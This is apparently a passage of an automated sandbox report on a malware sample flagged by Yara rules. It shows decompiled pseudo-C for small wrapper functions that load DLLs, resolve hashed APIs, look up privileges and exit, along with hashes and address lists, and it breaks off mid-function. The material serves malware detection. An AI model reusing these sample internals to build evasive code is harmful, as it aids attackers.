                                                        0x00409ac3
                                                        0x00409ac5
                                                        0x00409aca
                                                        0x00409acf
                                                        0x00409ae2
                                                        0x00409ae7
                                                        0x00409af0
                                                        0x00409afc
                                                        0x00409b0f
                                                        0x00409b14
                                                        0x00409b17
                                                        0x00409b20
                                                        0x00409b32
                                                        0x00409b37
                                                        0x00409b3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00409b3e
                                                        0x00409b42
                                                        0x00000000
                                                        0x00000000
                                                        0x00409b44
                                                        0x00000000
                                                        0x00409b42
                                                        0x00409b46
                                                        0x00409b49
                                                        0x00409b4f
                                                        0x00409b51
                                                        0x00409b5c
                                                        0x00409b61
                                                        0x00409b64
                                                        0x00409b71
                                                        0x00409b7c
                                                        0x00409b7e
                                                        0x00409b84
                                                        0x00409b88
                                                        0x00409b8b
                                                        0x00409b8b
                                                        0x00409b92
                                                        0x00409b95
                                                        0x00409b9a
                                                        0x00409ba7
                                                        0x00409ad6
                                                        0x00409ad6
                                                        0x00409ad6

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0041a647
                                                        0x0041a652
                                                        0x0041a65d
                                                        0x0041a661

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: 6EA
                                                        • API String ID: 1279760036-1400015478
                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040AC6C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E0040AC6C(void* __ebx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v1;
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				void* _v117;
				char _v536;
				struct _OBJDIR_INFORMATION _t31;
				struct _OBJDIR_INFORMATION _t33;
				struct _OBJDIR_INFORMATION _t34;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				intOrPtr* _t66;
				intOrPtr _t69;
				char* _t71;
				void* _t77;
				void* _t79;
				void* _t80;

				_t71 =  &_v1;
				if(_t71 < 0) {
					0xaec2e248();
					asm("loop 0x54");
					_push(_t71);
					_v8 =  &_v536;
					_t31 = E0041CC50( &_v12, 0x104, _a8);
					_t79 = _t77 - 0x214 + 0xc;
					__eflags = _t31;
					if(__eflags != 0) {
						_t33 = E0041D070(__eflags, _v8);
						_t80 = _t79 + 4;
						__eflags = _t33;
						if(_t33 != 0) {
							E0041D2F0( &_v12, 0);
							_t80 = _t80 + 8;
						}
						_t34 = E0041B4A0(_v8);
						_v16 = _t34;
						__eflags = _t34;
						if(_t34 == 0) {
							LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
							_t34 = _v16;
						}
						return _t34;
					} else {
						return _t31;
					}
				} else {
					_push(_t71);
					_t69 = _a8;
					_t66 = _a4;
					if(_t69 > 1) {
						_t5 = _t69 - 2; // 0xe8ea
						_t43 = _t66 + _t5;
						_t54 = _t69 - 1;
						do {
							 *_t43 =  *_t43 +  *((intOrPtr*)(_t43 + 1));
							_t43 = _t43 - 1;
							_t54 = _t54 - 1;
						} while (_t54 != 0);
						if(_t69 > 1) {
							_t44 = _t66;
							_t55 = _t69 - 1;
							do {
								 *_t44 =  *_t44 +  *((intOrPtr*)(_t44 + 1));
								_t44 = _t44 + 1;
								_t55 = _t55 - 1;
							} while (_t55 != 0);
						}
					}
					_t40 = E0040AA10(_t66, _t69, _a12);
					if(_t69 > 1) {
						_t12 = _t69 - 2; // 0xe8ea
						_t41 = _t66 + _t12;
						_t52 = _t69 - 1;
						do {
							 *_t41 =  *_t41 +  *((intOrPtr*)(_t41 + 1));
							_t41 = _t41 - 1;
							_t52 = _t52 - 1;
						} while (_t52 != 0);
						if(_t69 > 1) {
							_t42 = _t66;
							_t53 = _t69 - 1;
							do {
								 *_t42 =  *_t42 +  *((intOrPtr*)(_t42 + 1));
								_t42 = _t42 + 1;
								_t53 = _t53 - 1;
							} while (_t53 != 0);
						}
					}
					return _t40;
				}
			}



























                                                        0x0040ac6c
                                                        0x0040ac6d
                                                        0x0040ace9
                                                        0x0040acee
                                                        0x0040acf0
                                                        0x0040ad0c
                                                        0x0040ad0f
                                                        0x0040ad14
                                                        0x0040ad17
                                                        0x0040ad19
                                                        0x0040ad23
                                                        0x0040ad28
                                                        0x0040ad2b
                                                        0x0040ad2d
                                                        0x0040ad35
                                                        0x0040ad3a
                                                        0x0040ad3a
                                                        0x0040ad41
                                                        0x0040ad49
                                                        0x0040ad4c
                                                        0x0040ad4e
                                                        0x0040ad62
                                                        0x0040ad64
                                                        0x0040ad64
                                                        0x0040ad6a
                                                        0x0040ad1b
                                                        0x0040ad1e
                                                        0x0040ad1e
                                                        0x0040ac6f
                                                        0x0040ac70
                                                        0x0040ac74
                                                        0x0040ac78
                                                        0x0040ac7e
                                                        0x0040ac80
                                                        0x0040ac80
                                                        0x0040ac84
                                                        0x0040ac87
                                                        0x0040ac8a
                                                        0x0040ac8c
                                                        0x0040ac8d
                                                        0x0040ac8d
                                                        0x0040ac93
                                                        0x0040ac95
                                                        0x0040ac97
                                                        0x0040aca0
                                                        0x0040aca3
                                                        0x0040aca5
                                                        0x0040aca6
                                                        0x0040aca6
                                                        0x0040aca0
                                                        0x0040ac93
                                                        0x0040acaf
                                                        0x0040acba
                                                        0x0040acbc
                                                        0x0040acbc
                                                        0x0040acc0
                                                        0x0040acc3
                                                        0x0040acc6
                                                        0x0040acc8
                                                        0x0040acc9
                                                        0x0040acc9
                                                        0x0040accf
                                                        0x0040acd1
                                                        0x0040acd3
                                                        0x0040acd6
                                                        0x0040acd9
                                                        0x0040acdb
                                                        0x0040acdc
                                                        0x0040acdc
                                                        0x0040acd6
                                                        0x0040accf
                                                        0x0040ace2
                                                        0x0040ace2

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74f31a5475c3ac62470ac21ed5d7384022201c69dfbc097c16fee53b3b421591
                                                        • Instruction ID: 8463cfb5f2cfbdb0b6ecb55caaab3a75965649350571dd15a7b479e1367fd4f3
                                                        • Opcode Fuzzy Hash: 74f31a5475c3ac62470ac21ed5d7384022201c69dfbc097c16fee53b3b421591
                                                        • Instruction Fuzzy Hash: 1531993180824A5FEB10DB54D884EFEB765DF51308F0901ABEC48AB3C2E5369D18C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00408308, Relevance: 1.6, APIs: 1, Instructions: 60threadwindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E00408308(signed int __eax, void* __ecx, void* __edi, intOrPtr* __esi, char _a1, long _a8) {
				intOrPtr _v4;
				char _v75;
				char _v76;
				void* _t16;
				int _t17;
				signed char _t26;
				long _t27;
				int _t32;
				char* _t34;
				void* _t35;
				void* _t37;
				void* _t42;

				_t34 =  &_a1;
				_t42 = __ecx -  *__esi;
				_push(ss);
				_t26 = __eax | 0x00000047;
				_push(_t34);
				_push(_t34);
				_t35 = _t37;
				_push(__esi);
				_v76 = 0;
				E0041BE60( &_v75, 0, 0x3f);
				E0041CA00( &_v76, 3);
				_t16 = E0040ACF0(_t42, _v4 + 0x1c,  &_v76); // executed
				_t17 = E00414E50(_v4 + 0x1c, _t16, 0, 0, 0xc4e7b6d6);
				_t32 = _t17;
				if(_t32 != 0) {
					_push(_t26);
					_t27 = _a8;
					_t17 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
					_t44 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t32(_t27, 0x8003, _t35 + (E0040A480(_t44, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}















                                                        0x0040830a
                                                        0x0040830b
                                                        0x0040830d
                                                        0x0040830e
                                                        0x0040830f
                                                        0x00408310
                                                        0x00408311
                                                        0x00408316
                                                        0x0040831f
                                                        0x00408323
                                                        0x0040832e
                                                        0x0040833e
                                                        0x0040834e
                                                        0x00408353
                                                        0x0040835a
                                                        0x0040835c
                                                        0x0040835d
                                                        0x0040836a
                                                        0x0040836c
                                                        0x0040836e
                                                        0x0040838b
                                                        0x0040838b
                                                        0x0040838d
                                                        0x00408392

                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 24519a4300da35bac221a6d5453449f937fff6bdccfbd1c8914f29ee81549d93
                                                        • Instruction ID: fa727f31792f2c50f00522f5244e5783d43d20787b559a9bd36b2efa0c2b99b3
                                                        • Opcode Fuzzy Hash: 24519a4300da35bac221a6d5453449f937fff6bdccfbd1c8914f29ee81549d93
                                                        • Instruction Fuzzy Hash: DF01F931A8032C77E721A6918C02FFF7B6C9B40F44F040119FF44BA1C2D6A8690642EA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                        0x00408310
                                                        0x0040831f
                                                        0x00408323
                                                        0x0040832e
                                                        0x0040833e
                                                        0x0040834e
                                                        0x00408353
                                                        0x0040835a
                                                        0x0040835d
                                                        0x0040836a
                                                        0x0040836c
                                                        0x0040836e
                                                        0x0040838b
                                                        0x0040838b
                                                        0x00000000
                                                        0x0040838d
                                                        0x00408392

                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                        • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                        • Opcode Fuzzy Hash: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                        • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A7C1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E0041A7C1(char __eax, void* __edi) {
				int _t11;
				void* _t20;
				void* _t21;

				asm("std");
				asm("sbb [edx-0x52], edi");
				asm("std");
				_t21 = _t20 + __edi;
				 *0x8b5517d2 = __eax;
				_push(_t21);
				_t8 =  *0x2CEB848C;
				E0041AF60(__edi,  *0x2CEB848C,  *0x2CEB848C + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
				_t11 = LookupPrivilegeValueW( *0x2CEB8490,  *0x2CEB8494,  *0x2CEB8498); // executed
				return _t11;
			}






                                                        0x0041a7c1
                                                        0x0041a7c2
                                                        0x0041a7ca
                                                        0x0041a7cb
                                                        0x0041a7cd
                                                        0x0041a7d0
                                                        0x0041a7d3
                                                        0x0041a7ea
                                                        0x0041a800
                                                        0x0041a804

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: eda8df48914424c61ff4b5e99b6835d10e66b02c092d1da004b765a191b2b482
                                                        • Instruction ID: 6d7fb5afb637da317353d187c690f03eea232bff9fbb75cebbf72132e33b3453
                                                        • Opcode Fuzzy Hash: eda8df48914424c61ff4b5e99b6835d10e66b02c092d1da004b765a191b2b482
                                                        • Instruction Fuzzy Hash: C1F0E5B12002046FC710DF6ACC41EE7B7B9EF84210F048159FD0C97301C530981987B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A663, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E0041A663(void* __ecx, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;

				asm("arpl [eax-0x46], dx");
				asm("ficom dword [eax-0x32005d64]");
				asm("sbb eax, 0xec8b55b1");
				_t8 = _a4;
				_t4 = _t8 + 0xc74; // 0xc74
				E0041AF60(__ecx, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}




                                                        0x0041a665
                                                        0x0041a668
                                                        0x0041a66e
                                                        0x0041a673
                                                        0x0041a67f
                                                        0x0041a687
                                                        0x0041a69d
                                                        0x0041a6a1

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 9843d2bcb16c100c03626d5469b0dacc0abd1c313e999880e2a00c614ec4ee0e
                                                        • Instruction ID: b0a18c842430e8a56578c67fe0a3e17785d783fb6f536a8799a76c3c6b559e6c
                                                        • Opcode Fuzzy Hash: 9843d2bcb16c100c03626d5469b0dacc0abd1c313e999880e2a00c614ec4ee0e
                                                        • Instruction Fuzzy Hash: 13E06DB1201204AFDB24DF55CD88FAB7769FF84320F14855AF9085B251C630E914CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0041a67f
                                                        0x0041a687
                                                        0x0041a69d
                                                        0x0041a6a1

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0041a7ea
                                                        0x0041a800
                                                        0x0041a804

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                        • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                        • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A6A2, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 30%
                                                        			E0041A6A2() {
				void* _t14;
				void* _t18;
				void* _t19;

				_pop(_t15);
				asm("sbb [esi-0x44002df2], ah");
				asm("stosd");
				asm("popfd");
				asm("repe and ah, bh");
				_t18 = _t19;
				_t6 =  *((intOrPtr*)(_t18 + 8));
				E0041AF60(_t14,  *((intOrPtr*)(_t18 + 8)),  *((intOrPtr*)(_t18 + 8)) + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess( *(_t18 + 0xc));
			}






                                                        0x0041a6a2
                                                        0x0041a6a4
                                                        0x0041a6aa
                                                        0x0041a6ab
                                                        0x0041a6ac
                                                        0x0041a6b1
                                                        0x0041a6b3
                                                        0x0041a6ca
                                                        0x0041a6d8

                                                        APIs
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 845736fd94040e2434066fda8230ae686c76948b1d5b84087b9edd6906ad8c67
                                                        • Instruction ID: 3ec09558eea1f1f427c9079433ace449e55154cce522f5e3da14cf8f372963c3
                                                        • Opcode Fuzzy Hash: 845736fd94040e2434066fda8230ae686c76948b1d5b84087b9edd6906ad8c67
                                                        • Instruction Fuzzy Hash: 5FE086795102147FD720DF69CC89FC7BBB8DF49760F14815EB9591B292C130AA05CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                        0x0041a6b3
                                                        0x0041a6ca
                                                        0x0041a6d8

                                                        APIs
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                        • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                        • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00B6C5F0, Relevance: 14.2, Strings: 11, Instructions: 424COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 55%
                                                        			E00B6C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v544;
				char _v1064;
				char _v1068;
				char _v1069;
				signed short* _v1076;
				signed short _v1080;
				intOrPtr _v1084;
				signed short _v1086;
				char _v1088;
				char _v1092;
				signed short _v1096;
				char _v1100;
				char* _v1104;
				short _v1106;
				char _v1108;
				char _v1111;
				char _v1112;
				signed short _v1116;
				char _v1120;
				intOrPtr _v1124;
				short _v1126;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				char* _v1156;
				short _v1158;
				char _v1160;
				intOrPtr _v1164;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				char* _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t173;
				intOrPtr _t175;
				void* _t191;
				void* _t193;
				intOrPtr _t200;
				char _t215;
				void* _t226;
				signed short _t250;
				void* _t284;
				signed short _t286;
				unsigned int _t292;
				short _t294;
				signed int _t295;
				void* _t296;

				_t173 =  *0xc22088; // 0x76fbb2c1
				_v8 = _t173 ^ _t295;
				_t175 = _a4;
				_t272 = _a8;
				_v1132 = _a16;
				_v1140 = _a20;
				_v1160 = 0;
				_v1158 = 0x208;
				_v1156 =  &_v1064;
				_t282 = 0;
				_t288 = 0;
				_t286 = _a12;
				_v1164 = _t175;
				_v1069 = 0;
				_v1068 = 0;
				_v1136 = 0;
				_v1088 = 0;
				_v1086 = 0;
				_v1084 = 0;
				_v1128 = 0;
				_v1126 = 0;
				_v1124 = 0;
				_v1144 = 0;
				if(_t175 == 0) {
					_t282 = 0;
					L66:
					_push(_t282);
					_push(_t286);
					_push(_t272);
					_push(_t175);
					E00B93F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t288 = 0xc000000d;
					L18:
					if(_v1069 == 0) {
						L20:
						if(_v1084 != 0) {
							 *0xb4e6f0(_v1084);
						}
						if(_v1068 != 0) {
							E00B3F9F0(_v1068);
						}
						if(_v1136 != 0) {
							E00B4E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
						}
						L23:
						return E00B4E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
					}
					L19:
					_v1120 = _v1144;
					_v1132(4,  &_v1120, _v1140);
					goto L20;
				}
				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
					_t282 =  *((intOrPtr*)(_t175 + 4));
					goto L66;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
						goto L23;
					}
					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
					_t291 =  *((intOrPtr*)(_t191 + 0x50));
					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
						_push(_t272);
						E00B93F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
						L39:
						_t288 = 0xc0000106;
						goto L20;
					}
					if(( *(_t191 + 4) & 0x00000010) != 0) {
						L27:
						_v1076 =  &_v1160;
						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
						_v1080 = _t286;
						if(_t286 == 0) {
							_t288 = 0xc00000e5;
							goto L23;
						}
						_t193 = E00B58342(_t286, 0x5c);
						_pop(_t272);
						if(_t193 == 0) {
							_t288 = 0xc00000e5;
							goto L20;
						}
						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
						if(_t286 > 0x208) {
							if(_t286 > 0xfffe) {
								goto L39;
							}
							_v1086 = _t286;
							_t200 =  *0xb4e6f4(_t286 & 0x0000ffff);
							_v1084 = _t200;
							if(_t200 != 0) {
								_v1076 =  &_v1088;
								goto L30;
							}
							_t288 = 0xc0000017;
							goto L20;
						}
						L30:
						_t292 = _t286 & 0x0000ffff;
						E00B42340(_v1076[2], _v1080, _t292 - 2);
						_t272 = 0;
						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
						_t296 = _t296 + 0xc;
						 *_v1076 = _t286;
						L15:
						if(_v1068 == 0) {
							if(E00B5DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
								E00B93F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
								_t288 = 0xc000003a;
								goto L18;
							}
							_v1136 = _v1124;
							_t215 = _v1180;
							if(_t215 != 0) {
								_v1128 = _t215;
								_v1124 = _v1176;
							} else {
								_v1172 = 0;
							}
							_v1200 = _v1172;
							_push(0x21);
							_v1196 =  &_v1128;
							_push(3);
							_push( &_v1212);
							_push( &_v1204);
							_push(0x100020);
							_v1204 = 0x18;
							_v1192 = 0x40;
							_v1188 = 0;
							_v1184 = 0;
							_t288 = E00B3FD74( &_v1068);
							E00B5A331( &_v1180, _t272,  &_v1180);
							if(_t288 >= 0) {
								goto L16;
							} else {
								_push(_t288);
								E00B93F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
								goto L18;
							}
						}
						L16:
